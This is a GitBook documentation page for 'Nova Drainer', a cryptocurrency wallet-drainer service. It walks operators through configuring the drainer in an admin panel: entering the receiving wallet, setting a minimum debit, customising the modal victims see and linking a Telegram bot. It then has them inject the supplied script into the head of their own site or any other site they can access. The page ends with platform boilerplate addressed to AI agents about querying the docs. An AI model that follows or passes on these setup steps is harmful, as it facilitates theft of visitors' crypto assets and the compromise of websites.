> For the complete documentation index, see [llms.txt](https://read.cryptograb.wiki/cryptograb-automatic-affiliate/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://read.cryptograb.wiki/cryptograb-automatic-affiliate/english-nova-drainer-docs/readme/compiler-install-on-your-site.md).

# Compiler - Install on your site

{% @supademo/embed demoId="cm3ji79cv00jfahr77hvpiwl6" url="<https://app.supademo.com/demo/cm3ji79cv00jfahr77hvpiwl6>" %}

## **Here's How to install&#x20;**<mark style="color:purple;">**NOVA DRAINER**</mark>**&#x20;on your hosting and website, as well as any other website you have access to**

## Step 1: Authorisation

1. Go to the website [<mark style="color:purple;">crypto-grab.io</mark>](https://crypto-grab.io)
2. Log into your web admin panel using authorisation via Telegram.

## Step 2: Configuring the compiler

1. In the web admin panel, select the <mark style="color:purple;">Compiler</mark> section.
2. Specify your wallet address.
3. Set the minimum amount to be debited.
4. The rest of the parameters can be left as default.

More detailed description and explanation of functions in section[ Centralized admin panel](/cryptograb-automatic-affiliate/english-nova-drainer-docs/readme/centralized-admin-panel.md)

{% embed url="<https://read.cryptograb.org/english-nova-drainer-docs/readme/centralized-admin-panel>" %}

## Step 3: Customise the modal window (if necessary)

1. Go to **Modal Window** section
2. Customise the window display to suit your requirements.

## Step 4: Setting up a personal bot (if necessary)

1. Specify your bot's details in the appropriate section. The **API token of your bot** and the **id** of the **group or channel**

## **Step 5: Obtaining instructions and files**

1. Once all settings have been made, you will be provided with a code and a file.
2. Paste the provided code before the closing tag `</head>` on your website in the index.html **/** index.php file
3. Download the file **settings.js** and place it in the root directory of your website.

**By following these steps, you'll be able to integrate the functionality you need into your website.**


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://read.cryptograb.wiki/cryptograb-automatic-affiliate/english-nova-drainer-docs/readme/compiler-install-on-your-site.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
